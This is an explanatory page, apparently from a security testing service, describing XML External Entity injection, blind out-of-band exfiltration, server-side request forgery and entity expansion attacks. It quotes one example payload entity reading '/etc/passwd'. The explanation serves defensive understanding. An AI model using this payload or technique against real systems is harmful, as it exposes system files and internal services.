XML External Entity injection (XXE) is a vulnerability that targets applications parsing XML input. It exploits the XML specification's support for external entities, which are references to external resources that the XML parser resolves during document processing. When an application processes user-supplied XML without disabling external entity resolution, an attacker can define malicious entities that read local files, make server-side requests to internal systems, or cause denial of service through entity expansion attacks.
How It Works
XML documents can define entities in their Document Type Definition (DTD). An external entity references a resource using a URI, such as <!ENTITY xxe SYSTEM "file:///etc/passwd">. When the parser processes the document and encounters &xxe; in the content, it replaces the entity reference with the contents of the specified file. If the parsed output is returned to the attacker in the application's response, they receive the file contents directly.
When the application does not reflect parsed XML content in its response, blind XXE techniques are used instead. The attacker defines an external entity that triggers an out-of-band connection to an attacker-controlled server, often exfiltrating data through URL parameters. For example, a parameterized entity can read a local file and send its contents as part of a DNS lookup or HTTP request to the attacker's infrastructure.
XXE can also be used for server-side request forgery by specifying internal network addresses as entity URIs. The XML parser makes requests on behalf of the server, allowing the attacker to scan internal ports, access internal APIs, and interact with services that are not directly reachable from the internet. Entity expansion attacks, where entities reference other entities in a recursive or deeply nested structure, can consume server memory and cause denial of service.
Why It Matters
XXE remains a relevant vulnerability because XML is still widely used in SOAP APIs, document processing, SVG handling, and configuration file parsing. Many applications accept XML input in unexpected places, such as file upload endpoints that process DOCX, XLSX, or SVG files, all of which are XML-based formats. Security assessments should test any XML processing endpoint for XXE, including less obvious entry points where XML is embedded within other file formats.
Need your application tested? Get in touch.